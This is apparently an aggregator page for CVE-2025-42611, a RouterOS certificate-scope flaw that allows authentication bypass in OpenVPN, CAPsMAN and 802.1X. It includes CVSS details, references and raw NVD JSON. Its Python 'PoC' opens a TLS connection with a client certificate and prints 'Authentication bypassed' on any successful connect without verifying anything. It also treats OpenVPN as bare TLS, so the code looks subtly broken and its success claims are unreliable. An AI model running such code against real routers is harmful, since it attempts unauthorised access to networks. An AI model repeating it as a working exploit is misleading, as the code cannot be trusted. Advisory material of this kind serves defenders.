CVE-2025-42611

Description

RouterOS provides various services that rely on correct verification of client and server certificates to secure confidentiality and integrity of communications. This includes OpenVPN, CAPsMAN, Dot1x (802.1X), among others. The vulnerability lies in shared certificate validation logic which uses the system certificate store that is shared and equally trusted by all system services. This causes confusion of scope, allowing any certificate authority present in the system-wide trust store to be trusted in any context (with some exceptions), allowing partial or full authentication bypass in CAPsMAN, OpenVPN, Dot1X and potentially others.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

RouterOS (具体受影响版本请参考厂商公告)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC concept: Authenticating to RouterOS OpenVPN using a cert signed by a generic trusted CA
# This requires a RouterOS vulnerable to CVE-2025-42611 and a trusted public CA cert.

import socket
import ssl

def attempt_vpn_bypass(target_ip, port, cert_file, key_file):
    # Create a standard SSL socket
    context = ssl.create_default_context()
    # Load the certificate signed by a public/trusted CA present in RouterOS system store
    context.load_cert_chain(certfile=cert_file, keyfile=key_file)
    
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        # Wrap socket with SSL
        secure_sock = context.wrap_socket(sock, server_hostname=target_ip)
        secure_sock.connect((target_ip, port))
        
        print(f"[+] Connection established to {target_ip}:{port}")
        print(f"[+] Certificate verified by RouterOS using system-wide trust store.")
        print(f"[+] Authentication bypassed / Successful.")
        secure_sock.close()
        return True
    except Exception as e:
        print(f"[-] Connection failed: {e}")
        return False

# Example usage:
# attempt_vpn_bypass('192.168.88.1', 1194, 'public_ca_signed.crt', 'private.key')

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-42611
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-42611
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-42611/
[4] VulDB https://vuldb.com/cve/CVE-2025-42611
[5] https://www.cert.si/en/cve-2025-42611/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-42611", "sourceIdentifier": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158", "published": "2026-05-05T11:16:31.827", "lastModified": "2026-05-07T14:51:53.657", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "RouterOS provides various services that rely on correct\nverification of client and server certificates to secure confidentiality and\nintegrity of communications. This includes OpenVPN, CAPsMAN, Dot1x (802.1X),\namong others.\n\n\n\nThe vulnerability lies in shared certificate validation\nlogic which uses the system certificate store that is shared and equally\ntrusted by all system services. This causes confusion of scope, allowing any\ncertificate authority present in the system-wide trust store to be trusted in\nany context (with some exceptions), allowing partial or full authentication\nbypass in CAPsMAN, OpenVPN, Dot1X and potentially others."}], "metrics": {"cvssMetricV31": [{"source": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-295"}]}], "references": [{"url": "https://www.cert.si/en/cve-2025-42611/", "source": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158"}]}}